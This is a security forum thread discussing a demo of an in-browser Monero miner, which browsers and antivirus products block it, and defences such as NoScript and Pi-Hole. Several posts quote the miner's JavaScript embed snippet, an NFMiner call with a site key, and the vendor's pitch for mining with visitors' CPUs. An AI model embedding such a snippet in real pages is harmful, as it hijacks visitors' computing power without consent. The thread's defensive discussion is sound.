App Review Browsers vs In Browser CryptoCurrency Miners

[cruelsister]

This video demonstrates a specific Monero webassembly/Jscript Miner, demonstrating that not all browsers are alike at default. Note that in a majority of cases all browsers will fail.

No earthshaking revelations here, just a fun demo video for those that may not have dealt with these Miners before.

 

[Av Gurus]

...this web page still not detected (accept Fortinet)...



VirusTotal

 

[TairikuOkami]

...this web page still not detected (accept Fortinet)...

Is it still alive? I have tried all browsers and not a problem. I guess it depends on system settings as well then.

 

[upnorth]

Thanks for the share!

I wonder the same as @TairikuOkami because when I test the url with Opera the latest stable version 51.0.2830.55 and with no addons enabled and without the Block Ads option my CPU is idle on 2%. Perhaps it's blocked on the ISP level?

 

[erreale]

...this web page still not detected (accept Fortinet)...

The result of VirusTotal is very strange. Emsisoft immediately blocked it this morning

 

[abdou17]

Kaspersky Free

 

[upnorth]

This was interesting IMO :

var miner = new NFMiner("186ea", {load: "low"});

NF WebMiner lets you mine for Monero using your visitors' CPU power. Just get your mining key below, enter a few lines of HTML/JavaScript in your web pages and start monetizing your website.

Your profit will vary depending on the number of visitors, the time they have the page open and their processing power. Our miner uses WebAssembly which gives the maximum performance, however you probably can expect on average 25-30 H/s per visitor.

 

[mekelek]

page seem to not have the miner on it anymore

or yandex/chrome policy blocked the js

nothing with Firefox either.

 

[upnorth]

page seem to not have the miner on it anymore

The side source says otherwise. It's the last line.

 

[mekelek]

The side source says otherwise. It's the last line.

it's commented out

 

[abdou17]

Is this normal ??!
it happens on NOKIA HOME PAGE with both Chrome and Firefox

 

[mekelek]

Is this normal ??!
it happens on NOKIA HOME PAGE with both Chrome and Firefox

View attachment 182568

it's playing an mp4 in the background, it's normal, tho your GPU is sweating a bit.

 

[upnorth]

 

[Der.Reisende]

Sarah McLachlan, you have an excellent taste sis!

Back to topic:
Thank you for taking your time to show of the danger of in-Browser miners!

 

[cruelsister]

A fun fact about the website used- whoever is behind the Miner has their identity protected as they went through a Domain Privacy business (Whois Privacy Corp). This server is (or at least was) in Germany and the contact information is listed as Nassau, The Bahamas.

A great deal of scamming is brokered by Whois, and they've been sued a number of times from companies like De Beers to people like John Stamos. They also hosted a few of the Russian Troll sites of the boys from St, Pete that were involved in the US Election Abuse matter; and of course they also frequently use CloudFlare farms.

 

[Peter2150]

Yep, I use No Script with all unchecked as def. Blocks the miners

 

[ForgottenSeer 58943]

...this web page still not detected (accept Fortinet)...

View attachment 182559

VirusTotal

Not surprising. Fortinet has taken some priority in dealing with coin miners.

Also Pi-Hole w/Coin list stopped it ASAP at the DNS level.

 

[simmerskool]

Sarah McLachlan, you have an excellent taste sis!

Back to topic:
Thank you for taking your time to show of the danger of in-Browser miners!

+1 & +1

 

[Nightwalker]

Thanks for the video, great as always.

Ps 1: Maybe I should revisit SeaMonkey.
Ps 2: My mother loves that song.

 

[Prorootect]

Yes miner script is here, but not mining for now...
On Cent browser (but nothing seen in Console):
"<!--<script src="lib/miner.js"></script>
<script>
var miner = new NFMiner("186ea", {load: "low"});
miner.start();
</script>-->"
... and too on Firefox Nightly. No possiblity to copy from DOM and Style Inspector, and nothing seen in Console...
Bookmarked.

Thanks, cruelsister !